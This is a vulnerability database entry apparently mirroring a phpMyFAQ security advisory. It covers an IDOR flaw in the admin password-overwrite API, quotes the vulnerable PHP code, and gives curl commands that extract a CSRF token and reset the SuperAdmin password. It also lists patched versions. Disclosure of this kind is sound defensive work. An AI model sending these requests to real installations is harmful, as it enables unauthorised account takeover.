Fluid Attacks Database

Description

phpMyFAQ: IDOR Account Takeover

Summary

An Insecure Direct Object Reference (IDOR) vulnerability in phpMyFAQ's Admin API allows any authenticated administrator to change the password of any user account, including SuperAdmin accounts (userId=1), without authorization verification. An attacker with a low-privilege admin account can escalate privileges to full SuperAdmin control by simply changing the target user's ID in the API request body.

Details

File: phpmyfaq/src/phpMyFAQ/Controller/Administration/Api/UserController.php Lines: 232-271 The overwritePassword() method at line 232 accepts PUT requests to /admin/api/user/overwrite-password: #[Route(path: 'user/overwrite-password', name: 'admin.api.user.overwrite-password', methods: ['PUT'])]

public function overwritePassword(Request $request): JsonResponse
{
    $this->userHasUserPermission();  // Only checks if user has USER_EDIT permission
    $currentUser = CurrentUser::getCurrentUser($this->configuration);
    $data = json_decode($request->getContent());
    $userId = Filter::filterVar($data->userId, FILTER_VALIDATE_INT);  // User-controlled!
    $csrfToken = Filter::filterVar($data->csrf, FILTER_SANITIZE_SPECIAL_CHARS);
    $newPassword = Filter::filterVar($data->newPassword, FILTER_SANITIZE_SPECIAL_CHARS);...

Root Causes:

No verification that the requesting admin has permission to modify the target user's password

No check that the target user has equal or lower privilege level

The userId is taken directly from the request body without authorization context

No multi-factor confirmation for privilege-escalating password changes

PoC

Prerequisites: Authenticated admin session with USER_EDIT permission

Step 1 - Obtain Admin Session: Log in as a low-privilege admin user (or exploit CVE-2026-XXXX-1 to take over any user first).

Step 2 - Extract CSRF Token: CSRF token is embedded in admin pages:

curl -sL -b "PHPSESSID=admin_session" http://target/admin/index.php | grep -oP 'pmf-csrf-token.*?value="\K[^"]+'

Step 3 - Change SuperAdmin Password:

curl -X PUT -H "Content-Type: application/json" \
  -b "PHPSESSID=admin_session" \
  -d '{
    "userId": 1,
    "csrf": "admin_csrf_token_value",
    "newPassword": "NewSuperAdminP@ss123!",
    "passwordRepeat": "NewSuperAdminP@ss123!"
  }' \...

Response: {"success":"The password was successfully changed."}

Step 4 - Account Takeover: Attacker now has SuperAdmin credentials and full control of phpMyFAQ.

Who is Impacted:

Organizations with multiple admin users where not all should have SuperAdmin access

Any phpMyFAQ instance where privilege separation is configured

Multi-tenant environments where users should only manage their own accounts

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem	Package	Affected version	Patched versions
packagist	thorsten/phpmyfaq	>=0 <4.1.3	4.1.3
packagist	phpmyfaq/phpmyfaq	>=0 <4.1.3	4.1.3

Aliases

1. CVE-2026-356712. NVD-2026-356713. OSV-2026-356714. GHSA-xvp4-phqj-cjr35. GCVE-2026-35671

References

1. https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-xvp4-phqj-cjr3

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.